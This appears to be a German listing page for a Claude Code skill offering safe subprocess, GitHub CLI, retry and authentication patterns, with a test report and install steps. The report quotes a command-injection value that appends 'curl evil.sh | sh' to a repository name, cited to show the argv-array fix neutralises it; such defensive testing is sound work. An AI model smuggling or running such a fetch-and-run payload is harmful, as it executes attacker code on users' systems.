API Integration Patterns

Prozesssichere API/CLI-Muster: kein shell=True, Whitelist-Befehle, Retry-Backoff, Token-Validierung.

von akaszubski · akaszubski/autonomous-dev

Getestet · Funktioniert ★ 8.4/10

API Integration Patterns — Prozesssichere API/CLI-Muster: kein shell=True, Whitelist-Befehle, Retry-Backoff, Token-Validierung.

Was es kann

Eine Referenzmuster-Fähigkeit, die sichere Subprozess-, GitHub CLI-, Retry-with-Backoff-, Authentifizierungs- und Ratenbegrenzungsmuster liefert, wenn Claude externe API- oder CLI-Integrationscode schreibt. Wird ausgelöst bei Schlüsselwörtern wie subprocess/gh-cli/API-call/retry/auth und schließt explizit interne Funktionen oder reine Konfigurationsänderungen aus.

Testbericht

Echter CWE-78-Test: Der Basiscode verwendete shell=True mit einem f-String-Repositorynamen, was es einem präparierten Repositorywert ermöglichte, 'curl evil.sh | sh' anzuhängen; die argv-Array + shell=False-Version der Fähigkeit übergab denselben bösartigen String durch gh als ein inertes Argument. Konkret, nicht kosmetisch.

Getestet am: 2026-07-15 · Claude Code 2.x (agent harness)

Installation

git clone https://github.com/akaszubski/autonomous-dev
cd autonomous-dev
mkdir -p ~/.claude/skills
cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns

Befehle & Beispiel-Prompts

  • /api-integration-patternsProzesssichere API/CLI-Muster: kein shell=True, Whitelist-Befehle, Retry-Backoff, Token-Validierung.

Skills reagieren auf normale Anfragen — keine Slash-Befehle nötig. Nach der Installation aktivieren Prompts wie diese den Skill (auf Englisch):

  • Write a Python function that lists GitHub issues via the gh CLI
  • Add retry logic with exponential backoff to my API client code
  • Help me safely handle subprocess calls without shell injection risk